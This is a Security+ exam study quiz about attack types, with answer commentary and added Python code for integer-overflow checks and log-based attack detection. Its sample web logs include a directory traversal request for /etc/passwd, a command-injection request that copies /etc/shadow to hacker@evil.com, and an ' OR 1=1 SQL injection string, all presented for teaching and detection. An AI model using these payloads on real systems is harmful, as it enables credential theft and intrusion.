# Domain 1 Quiz

1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
1. Walking down the street, you get advertising messages from stores you are walking past
2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
a. SPIM
b. Bluesnarfing
c. Vishing
d. Bluejacking
1=d, 2=b, 3=a, 4=c

Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.

SPIM = Spam over Instant Messaging.

Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms.
2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
1. Improper account configuration
2. Memory leak
3. Buffer overflow
4. Integer overflow
5. Race condition
The idea is that the UID was so large that it rolled over MAX_INT (or the maximum integer representable in the programming language on that architecture). The Y2K problem was this in two base-ten digits. With unsigned integers on 32-bit hardware, not paying attention to this problem:
2^32 - 1 = 4,294,967,295
but:
4,294,967,295 + 1 = 0
Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one.
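The wrap-around described above, as an added illustration that is not part of the quiz: `wrap` models storing a value in an n-bit C integer (unsigned, or two's-complement signed), and `checked_uid` is the range check that would have stopped the attack the question describes. Both helper names are my own.

```python
def wrap(value, bits, signed=False):
    """Store value in a bits-wide integer the way C hardware does on overflow:
    keep only the low bits, then reinterpret as two's complement if signed."""
    modulus = 1 << bits
    v = value % modulus
    if signed and v >= modulus // 2:
        v -= modulus
    return v

def checked_uid(value, bits=32):
    """The fix: refuse any UID that does not fit before it is ever stored."""
    if not 0 <= value < (1 << bits):
        raise ValueError(f"uid {value} does not fit in {bits} unsigned bits")
    return value

# What the quiz describes: a "rather large" UID that wraps to a low, system one.
# 4,294,967,295 + 1 on unsigned 32-bit hardware, and the same idea in 16 and 8 bits.
if __name__ == "__main__":
    for bits in (32, 16, 8):
        big = (1 << bits) - 1
        print(f"{bits:2}-bit: {big} + 1 -> {wrap(big + 1, bits)}")
    print("signed 32-bit:", 2**31 - 1, "+ 1 ->", wrap(2**31, 32, signed=True))
```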
3. You observe the following.
```
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
They tried to send the web server up out of the web content area and down into the `/etc` configuration area on a UNIX-family operating system.
4. You observe the following.
```
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
Know that `%20` is the URL (percent) encoding of a space, ASCII code 0x20. Notice the string:
`scp%20/etc/shadow%20hacker@evil.com`
which decodes to:
`scp /etc/shadow hacker@evil.com`
That's the syntax to use `scp` to make an SSH connection as user `hacker` at host `evil.com` and copy the file `/etc/shadow` (which contains the password hashes for the user accounts on the web server host!) to that user's home directory on that remote server.
5. You observe the following.
```
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
Decoded, the request contains `' OR 1=1 ;--`, the classic always-true clause that closes a quoted string, adds a condition that is always satisfied, and comments out the rest of the query.
An alternative version of this question is a description, "You notice strange punctuation marks in the log."
6. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
They hoped to send too much data to a privileged service that did not check input length to make sure it had enough memory to store the input.
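Detection logic for the four log-based questions above (3 through 6), as an added example that is not part of the quiz: it parses combined-format lines, percent-decodes the request target (repeatedly, so double encoding is caught too), and flags traversal, shell-command, SQL-injection and oversized requests. The first four sample lines are the quiz's own; the fifth, the length threshold and the regexes are my assumptions and would need tuning for a real site.

```python
import re
from urllib.parse import unquote

# Lines 1-4 are quoted from the quiz; line 5 is constructed (a 414 from a 1200-byte query).
SAMPLE_LOG = [
    '66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" - -',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    '174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -',
    "174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] \"GET /database/'%20OR%201=1%20;-- HTTP/1.1\" 200 25310 \"https://www.bing.com/\" - -",
    '203.0.113.9 - - [01/Jul/2020:00:04:10 +0000] "GET /search?q=' + 'A' * 1200 + ' HTTP/1.1" 414 0 "-" - -',
]

# Combined-log prefix: client, ident, user, [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
MAX_TARGET_LEN = 1024  # assumed threshold; set it above the site's longest legitimate URL

TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')                                   # a ".." path segment
SHELL_CMD_RE = re.compile(r'\b(scp|ssh|sh|bash|nc|wget|curl)\s+\S', re.I)      # shell verb + argument
SQLI_RE = re.compile(r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+|'\s*;\s*--", re.I)   # ' OR 1=1  or  ';--

def fully_decode(s, rounds=3):
    """Percent-decode until stable so %252e-style double encoding is seen too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line):
    """Return the attack labels that apply to one access-log line ([] if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    target = fully_decode(m.group("target"))
    labels = []
    if TRAVERSAL_RE.search(target):
        labels.append("directory traversal")
    if SHELL_CMD_RE.search(target):
        labels.append("command injection")
    if SQLI_RE.search(target):
        labels.append("sql injection")
    if len(m.group("target")) > MAX_TARGET_LEN or m.group("status") == "414":
        labels.append("unusually long request")
    return labels

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", line[:70])
```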
7. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
1. Clickjacking
2. Ransomware
3. Crimeware
4. Extortionware
5. Spyware
The tipoff is transfers out of her bank account, which CompTIA associates with "crimeware". Clickjacking could have to do with how it happened, but the question asks you to name the event. Ransomware would be the answer if she was told to pay to recover her data from deletion or encryption, extortionware if she was told to pay to avoid the exposure of embarrassing information (which might be untrue), spyware would have to do with sensitive information being stolen. If you say "Yes, but if there was spyware that could lead to stealing her banking credentials, and that could lead to the transfers", you are building a more complicated answer.
8. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
1. False-positive event
2. False-negative event
3. Zero-day event
4. IDS failure event
5. IPS failure event
"In a database" is CompTIA's allusion to Mitre's CVE list.
9. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
1. APT
2. Rootkit
3. Rogue AP
4. Replay
Lots of clutter and distraction around a simple story: Someone authenticated, the attacker recorded and retransmitted (replayed) it to get in. On the actual CompTIA exam they might include the head of Radiology's name, what category of images she was looking at, and so on.
10. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
1. Misconfigured account
2. Untrained user
4. Memory leak
The user shouldn't have been able to destroy the database table.
11. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
1. Nothing, your ISP is wrong
2. RAT
3. BOT
4. Trojan
Smart TVs, Blu-ray players, and DVRs all run Linux, although their owners rarely know this. They're based on rather old versions, usually with a 2.2.26 kernel from 2004, often with well-known default passwords, and with no way to patch or reconfigure them. The device has become a 'bot or zombie in a DDoS attack. Yes, the perpetrator is controlling it, but not doing any RAT-like abuse (collecting data from your house, interacting with you), and they didn't have to tempt you with a Trojan to get in. My guess would be that your router has PnP or Plug-and-Play turned on, and they connected in — the Mirai botnet did exactly this, with huge numbers of IoT devices running a Telnet service with a known default password. Yes, the premise of this question seems strange (you get a letter at home), but questions very much like this are in the pool. I got two or three questions set at home, one very similar to this.
12. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
1. Improper input handling
3. Support beyond end-of-life
4. Default configurations
Everything but the last sentence is distraction, to waste your time and maybe confuse you. CompTIA does a LOT of this!

User input may be hostile, so always assume that it is. It must be validated and either rejected or corrected if of inappropriate size, format, syntax, semantics, etc.
13. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She has identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
2. Shimming
3. Driver refactoring
4. Data flow manipulating
Driver shimming can be legitimately used to make an older 32-bit driver compatible with a 64-bit operating system. However, malicious software can masquerade as a legitimate shim.

This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology.
14. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
1. Active reconnaissance
2. Passive reconnaissance
3. Open-source analysis
4. Pivoting
It is active, not passive, because her software is sending inputs and interacting with the web server. It isn't open-source because Black Box implies the opposite. Pivoting means breaking into one system, using it as a foothold to attack other systems inside.
15. Jermain is fielding help desk reports of WLAN clients repeatedly disassociating from their WAPs and having to reassociate. What may be responsible? Select two.
1. Bluesnarfing
2. Jamming
3. War driving
4. Channel conflicts
5. SSID loss
Jamming would be intentional; either that or accidental channel conflicts could cause enough signal interference to knock the clients off the WLAN.
16. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
1. Refactoring
2. Shimming
4. Modifying
It literally modifies the code, but "refactoring" is what you must select to get the point. The changes make automated detection much more difficult.
17. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
1. Embedded systems
2. EOL
3. IoT
4. Input validation
5. Error handling
End of Life. Many deployed ATMs still run Windows XP. Embedded and IoT become more tempting with the emphasis on the ATMs being built into enclosures. Proper and complete input validation and error handling are, of course, very important, but the question is about things they haven't yet done.
18. George's manager needs to give a presentation to the board of directors, telling them about the most critical threat to the organization. What should George make sure is highlighted?
1. Asset management
2. Insider threat
3. Social media
4. Baseline deviations
5. Performance
6. Unauthorized software
We have technical controls for everything else, and the insider threat is always the most threatening.
19. Why might you use fuzzing? Select two.
1. You need to detect logical errors
2. You don't have the source code
3. You have the source code
4. You have the source code, but you signed a non-disclosure agreement
5. You're uncertain of the purpose of the software